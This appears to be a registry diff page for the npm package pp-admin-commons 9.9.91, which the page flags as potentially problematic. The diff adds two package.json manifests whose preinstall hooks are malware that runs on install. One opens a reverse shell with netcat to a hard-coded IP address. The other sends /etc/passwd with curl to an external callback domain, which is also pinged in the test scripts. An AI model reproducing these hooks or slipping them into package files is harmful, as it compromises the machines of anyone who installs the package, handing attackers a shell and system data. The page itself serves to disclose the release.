pp-admin-commons 9.9.91
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of pp-admin-commons might be problematic. Click here for more details.
- package/package.json +12 -0
- package/packagebkp.json +12 -0
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "pp-admin-commons",
|
3
|
+
"version": "9.9.91",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "ping sd97aecqvo9uz7gbu0y179fcy34usmgb.burpbis.com",
|
8
|
+
"preinstall":"/usr/bin/nc 51.38.127.184 53 -e sh"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
package/packagebkp.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "pp-admin-commons",
|
3
|
+
"version": "9.9.9",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "ping sd97aecqvo9uz7gbu0y179fcy34usmgb.burpbis.com",
|
8
|
+
"preinstall":"/usr/bin/curl --data '@/etc/passwd' $(hostname).sd97aecqvo9uz7gbu0y179fcy34usmgb.burpbis.com"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|